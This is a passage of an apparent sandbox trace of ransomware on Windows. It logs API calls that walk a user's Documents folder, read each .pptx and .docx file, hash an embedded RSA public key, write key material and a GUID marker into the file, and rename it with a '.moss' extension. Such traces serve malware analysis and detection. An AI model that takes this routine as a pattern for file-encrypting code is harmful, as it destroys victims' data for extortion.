pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.888] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.889] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.889] GetLastError () returned 0x0 [0169.889] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.889] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.889] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.889] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.889] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.889] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.889] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.890] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10ba9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.890] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.890] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.890] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.890] CloseHandle (hObject=0x664) returned 1 [0169.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.892] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.892] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wbij5VgtvvOhJD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wbij5vgtvvohjd.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wbij5VgtvvOhJD.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wbij5vgtvvohjd.pptx.moss")) returned 1 [0169.894] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a80a10, ftCreationTime.dwHighDateTime=0x1d59e1b, ftLastAccessTime.dwLowDateTime=0x26ee6720, ftLastAccessTime.dwHighDateTime=0x1d5aea6, ftLastWriteTime.dwLowDateTime=0x26ee6720, ftLastWriteTime.dwHighDateTime=0x1d5aea6, nFileSizeHigh=0x0, nFileSizeLow=0xf425, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winyJgXww1SkTs0Io.pptx", cAlternateFileName="WINYJG~1.PPT")) returned 1 [0169.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.894] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.894] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\winyJgXww1SkTs0Io.pptx") returned=".pptx" [0169.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\winyJgXww1SkTs0Io.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\winyjgxww1skts0io.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.895] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=62501) returned 1 [0169.895] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.898] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.898] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.899] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf425, lpOverlapped=0x0) returned 1 [0169.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.900] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.901] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.902] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.902] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.902] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.902] GetLastError () returned 0x0 [0169.902] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.902] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.902] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.902] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.902] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.902] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.903] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf425, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.903] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.903] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.903] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.904] CloseHandle (hObject=0x664) returned 1 [0169.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.905] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.905] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\winyJgXww1SkTs0Io.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\winyjgxww1skts0io.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\winyJgXww1SkTs0Io.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\winyjgxww1skts0io.pptx.moss")) returned 1 [0169.907] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6be5f6a0, ftCreationTime.dwHighDateTime=0x1d56e36, ftLastAccessTime.dwLowDateTime=0x5c83bf70, ftLastAccessTime.dwHighDateTime=0x1d5b9cd, ftLastWriteTime.dwLowDateTime=0x5c83bf70, ftLastWriteTime.dwHighDateTime=0x1d5b9cd, nFileSizeHigh=0x0, nFileSizeLow=0x1507f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XdAZp0 KSPHEJbye.docx", cAlternateFileName="XDAZP0~1.DOC")) returned 1 [0169.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.907] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.907] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XdAZp0 KSPHEJbye.docx") returned=".docx" [0169.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XdAZp0 KSPHEJbye.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xdazp0 ksphejbye.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.908] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=86143) returned 1 [0169.908] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.911] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15059, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.911] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.912] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.912] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1507f, lpOverlapped=0x0) returned 1 [0169.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.913] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.913] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.913] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.914] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.914] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.915] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.915] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.915] GetLastError () returned 0x0 [0169.915] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.915] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.915] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.915] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.915] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.915] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.916] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.916] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.916] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1507f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.916] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.917] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.917] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.917] CloseHandle (hObject=0x664) returned 1 [0169.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.919] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.919] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XdAZp0 KSPHEJbye.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xdazp0 ksphejbye.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XdAZp0 KSPHEJbye.docx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xdazp0 ksphejbye.docx.moss")) returned 1 [0169.921] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a8f200, ftCreationTime.dwHighDateTime=0x1d5a13f, ftLastAccessTime.dwLowDateTime=0x927fbe00, ftLastAccessTime.dwHighDateTime=0x1d57501, ftLastWriteTime.dwLowDateTime=0x927fbe00, ftLastWriteTime.dwHighDateTime=0x1d57501, nFileSizeHigh=0x0, nFileSizeLow=0x1123, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zt5ZyKBdOv3Ul.docx", cAlternateFileName="ZT5ZYK~1.DOC")) returned 1 [0169.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.921] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zt5ZyKBdOv3Ul.docx") returned=".docx" [0169.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zt5ZyKBdOv3Ul.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zt5zykbdov3ul.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.921] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=4387) returned 1 [0169.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.924] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.924] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.925] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.925] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1123, lpOverlapped=0x0) returned 1 [0169.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.926] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.926] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.927] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.927] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.927] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.927] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.927] GetLastError () returned 0x0 [0169.927] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.927] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.927] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.927] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.927] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.927] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.928] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.928] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.928] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1123, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.928] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.928] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.928] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 